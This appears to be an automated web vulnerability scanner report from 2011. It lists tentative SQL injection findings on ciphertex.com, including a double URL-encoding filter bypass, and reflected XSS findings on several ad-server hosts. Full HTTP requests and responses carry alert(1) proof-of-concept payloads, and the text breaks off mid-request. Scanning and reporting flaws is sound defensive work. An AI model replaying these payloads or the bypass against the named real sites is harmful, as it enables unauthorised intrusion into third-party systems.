16.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.7. http://c14.zedo.com/OzoDB/cutils/R53_7_7/jsc/1545/zpu.html

16.8. http://d3.zedo.com/jsc/d3/ff2.html

16.9. http://p.raasnet.com/partners/universal/in

16.10. http://sana.newsinc.com/sana.html

16.11. http://view.atdmt.com/ADO/iview/278612752/direct

16.12. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

16.13. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

16.14. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

16.15. http://virtualgoods.bigdoor.com/media/html/gambit/about.html

16.16. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php

17. Content type incorrectly stated

17.1. http://4qinvite.4q.iperceptions.com/1.aspx

17.2. http://ads.pointroll.com/PortalServe/

17.3. http://adserv.impactengine.com/www/kr/36/ui/b8/objembed.html/@@1315499800@@

17.4. http://amch.questionmarket.com/adsc/d879999/4/880134/randm.js

17.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php

17.6. http://amch.questionmarket.com/adscgen/st.php

17.7. http://amch.questionmarket.com/adscgen/sta.php

17.8. http://bin.clearspring.com/at/v/1/button1.6.swf

17.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.10. http://class.savannahnow.com/classifieds-bin/classifieds

17.11. http://drupal.org/misc/favicon.ico

17.12. http://go.savannahnow.com/partner_json/search

17.13. http://imp.fetchback.com/serve/fb/adtag.js

17.14. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml

17.15. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/advisory.jhtml

17.16. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/persistent.jhtml

17.17. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content

17.18. http://metrics.impactengine.com/rest/view/129534/5011/0

17.19. http://metrics.impactengine.com/rest/view/129534/5011/30

17.20. http://p.raasnet.com/partners/dfp

17.21. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6

17.22. http://ps2.newsinc.com/Playlist/show/10557/4106/994.xml

17.23. http://s0.2mdn.net/2251996/Pixel_1x1.jpg

17.24. http://www.cargoh.com/sites/all/themes/cargoh/images/icons/fav_mail.gif

17.25. http://www.mtv.co.uk/files/favicon.ico

17.26. http://www.onsugar.com/favicon.ico

17.27. http://www.pdx.edu/sites/all/themes/pdx_home/favicon.ico

17.28. http://www.pdx.edu/sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff

17.29. http://www.popsugar.com/ajaxharness

17.30. http://www.popsugar.com/favicon.ico

17.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

18. Content type is not specified

18.1. http://ad.yieldmanager.com/st

18.2. http://ads.bluelithium.com/st



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ciphertex.com/content/product-comparison [SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ciphertex.com
Path:   /content/product-comparison

Issue detail

The SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e%2527; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:45:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:45:28 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e%2527%2527; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:45:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:27 GMT
Vary: Accept-Encoding
Content-Length: 58017
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
<meta ht
...[SNIP]...

1.2. http://ciphertex.com/content/product-comparison [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ciphertex.com
Path:   /content/product-comparison

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1%2527; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:46:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:46:07 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1%2527%2527; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:46:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:06 GMT
Vary: Accept-Encoding
Content-Length: 58017
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
<meta ht
...[SNIP]...

1.3. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ciphertex.com
Path:   /themes/garland/minnelli/minnelli.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /themes%2527/garland/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:44:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:44:58 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /themes%2527%2527/garland/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:58 GMT
Vary: Accept-Encoding
Content-Length: 9996
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 145 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://4qinvite.4q.iperceptions.com/1.aspx [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a61f2'-alert(1)-'18bb0f0ae28 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2a61f2'-alert(1)-'18bb0f0ae28 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.digitaldollhouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE01
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Mon, 12 Sep 2011 12:50:24 GMT
Content-Length: 1296

var sID= '5432'; var sC= 'IPE5432';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= '4Q-WEB2a61f2'-alert(1)-'18bb0f0ae28'; var ps='sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2a61f2%27-alert(1)-%2718bb0f0ae28';var IPEspeed = 5;var _invite = 'ips-invite'; rn='5432';var sGA='';function setupGA(
...[SNIP]...

2.2. http://ad.yieldmanager.com/rw [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b97c8"><script>alert(1)</script>99f052b9bda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68&b97c8"><script>alert(1)</script>99f052b9bda=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 828
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" framebord
...[SNIP]...
hy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68&b97c8"><script>alert(1)</script>99f052b9bda=1">
...[SNIP]...

2.3. http://ad.yieldmanager.com/rw [qs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The value of the qs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcde"><script>alert(1)</script>44f1c8c103a was submitted in the qs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=&qs=5fcde"><script>alert(1)</script>44f1c8c103a HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
